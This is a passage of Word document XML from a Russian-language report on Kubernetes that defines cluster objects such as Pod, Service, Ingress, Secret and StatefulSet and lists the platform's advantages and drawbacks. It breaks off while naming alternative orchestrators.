    <w:p w14:paraId="65A124B9" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc231073608"/>
      <w:bookmarkStart w:id="20" w:name="_Toc231774170"/>
      <w:bookmarkStart w:id="21" w:name="_Toc231834638"/>
      <w:r>
        <w:t>Рабочая нода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="720AADF0" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:t xml:space="preserve">Рабочая нода - придаточный узел кластера, в котором находится контейнеры для приложения. Управляется компонентами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFBD23" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:t>Основные компоненты рабочей ноды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC79F63" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> контейнеры (приложение, БД)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A713B" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kubelet </w:t>
      </w:r>
      <w:r>
        <w:t>процесс</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16BD39" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656616E9" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для тонкой настройки рабочих нод существуют компоненты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="008C133A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889D55E" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1571"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc231073609"/>
      <w:bookmarkStart w:id="23" w:name="_Toc231774171"/>
      <w:bookmarkStart w:id="24" w:name="_Toc231834639"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="7ACB4020" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – абстракция, находящаяся над нодой, которая запускает и изолирует группу контейнеров, находящихся в ноде и дает возможность контроля для определенной части инфраструктуры. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pod </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">является наименьшей единицей развертывания в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626808AE" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc231073610"/>
      <w:bookmarkStart w:id="26" w:name="_Toc231774172"/>
      <w:bookmarkStart w:id="27" w:name="_Toc231834640"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4C21DB32" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="009025CE">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">абстракция, находящаяся над подами, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>адресс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2DACA" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc231073611"/>
      <w:bookmarkStart w:id="29" w:name="_Toc231774173"/>
      <w:bookmarkStart w:id="30" w:name="_Toc231834641"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ingress</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1EF0581E" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ingress</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">объект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">который управляет внешним трафиком, а также маршрутизирует его к сервису ноды. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ingress</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>позволяет оптимально распределить весь трафик по всем необходимым сервисам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05713D7C" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc231073612"/>
      <w:bookmarkStart w:id="32" w:name="_Toc231774174"/>
      <w:bookmarkStart w:id="33" w:name="_Toc231834642"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ConfigMap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="64507591" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="00225472" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ConfigMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>внешняя конфигурация приложения, которая служит для хранения настроек всего кластера.</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ConfigMap </w:t>
      </w:r>
      <w:r>
        <w:t>служит для хранения только публичной информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB2C5D" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc231073613"/>
      <w:bookmarkStart w:id="35" w:name="_Toc231774175"/>
      <w:bookmarkStart w:id="36" w:name="_Toc231834643"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="10A1F32F" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00225472">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00162937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">хранятся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ETCD</w:t>
      </w:r>
      <w:r w:rsidRPr="00162937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сервера в незашифрованном виде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB0E3E" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc231073614"/>
      <w:bookmarkStart w:id="38" w:name="_Toc231774176"/>
      <w:bookmarkStart w:id="39" w:name="_Toc231834644"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volume</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="4D5E34E4" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="00864663" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volume</w:t>
      </w:r>
      <w:r w:rsidRPr="00162937">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">объект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00162937">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volume</w:t>
      </w:r>
      <w:r w:rsidRPr="00162937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volume</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A993F" w14:textId="479485E1" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc231073615"/>
      <w:bookmarkStart w:id="41" w:name="_Toc231774177"/>
      <w:bookmarkStart w:id="42" w:name="_Toc231834645"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deployment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="4AC026EA" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D296C">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Deployment - высокоуровневый объект, описывающий желаемое поведение группы подов и управляющий их жизненным циклом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBA029" w14:textId="5E1B0FD1" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc231073616"/>
      <w:bookmarkStart w:id="44" w:name="_Toc231774178"/>
      <w:bookmarkStart w:id="45" w:name="_Toc231834646"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="6B84DDA5" w14:textId="7CCD68BF" w:rsidR="007D296C" w:rsidRPr="00FC006D" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D296C">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>STS (StatefulSet) - объект kubernetes, который связывает БД из нод с контейнерами приложений с основным хранилищем</w:t>
      </w:r>
      <w:r w:rsidR="00FC006D" w:rsidRPr="00FC006D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A0D1B" w14:textId="626EC9AF" w:rsidR="007D296C" w:rsidRDefault="006D4C69" w:rsidP="006D4C69">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc231834647"/>
      <w:r>
        <w:t xml:space="preserve">Особенности, преимущества и недостатки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="4852215E" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">Kubernetes имеет ряд преимуществ, благодаря которым он широко используется для управления контейнеризированными приложениями. Он позволяет </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:lastRenderedPageBreak/>
        <w:t>автоматизировать развертывание, масштабирование и поддержку приложений, а также обеспечивает более эффективное использование вычислительных ресурсов. Kubernetes особенно полезен в сложных инфраструктурах, где необходимо управлять большим количеством сервисов, обеспечивать отказоустойчивость и быстро выпускать новые версии программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6EB31" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:t>К основным преимуществам Kubernetes относят:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D097AAF" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">автоматическое развертывание и управление контейнерами; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB47B24" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">возможность горизонтального масштабирования приложений; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4FFBF" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">автоматическое восстановление контейнеров при сбоях; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61344356" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">балансировку нагрузки между экземплярами приложения; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D082B4F" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">поддержку rolling updates и rollback при обновлениях; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D725336" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">переносимость приложений между разными средами: локальной, облачной и гибридной; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF0C78" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">эффективное использование ресурсов кластера; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE26DF" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">удобное управление конфигурациями и секретами; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5F33B" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">развитую экосистему инструментов и расширений; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0FD72" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">поддержку микросервисной архитектуры. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7BE2D" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:t>Однако Kubernetes имеет и недостатки. Несмотря на широкие возможности, эта платформа является достаточно сложной в освоении и эксплуатации. Для её эффективного использования требуются знания в области контейнеризации, сетей, безопасности, мониторинга и DevOps-практик. Кроме того, Kubernetes может быть избыточным решением для небольших проектов, где достаточно более простых инструментов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5647B44A" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:t>К недостаткам Kubernetes можно отнести:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC62F6" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">высокий порог входа для начинающих специалистов; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD364E" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">сложность настройки и администрирования кластера; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A93E5A" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">необходимость постоянного мониторинга и сопровождения; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9F1D0" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">дополнительные расходы на инфраструктуру и поддержку; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784EA0B6" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">сложность диагностики ошибок и сетевых проблем; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B785263" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">необходимость тщательной настройки безопасности; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD8BF0" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">избыточность для небольших и простых приложений; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE464A" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">зависимость от квалификации команды DevOps/SRE; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B3F06" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">возможное усложнение архитектуры проекта; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107DC796" w14:textId="77777777" w:rsidR="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="-1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E0717">
        <w:t>потребность в дополнительных инструментах для логирования, мониторинга и CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEFAE0" w14:textId="1CA1FCA3" w:rsidR="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc231834648"/>
      <w:r>
        <w:t xml:space="preserve">Существующие аналоги </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="4960B0A5" w14:textId="5EC20E58" w:rsidR="006E0717" w:rsidRPr="00864663" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">Существуют и другие решения оркестровки кластера контейнеров. К ним относят такие решения, как </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nomad</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Amazon</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ECS</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
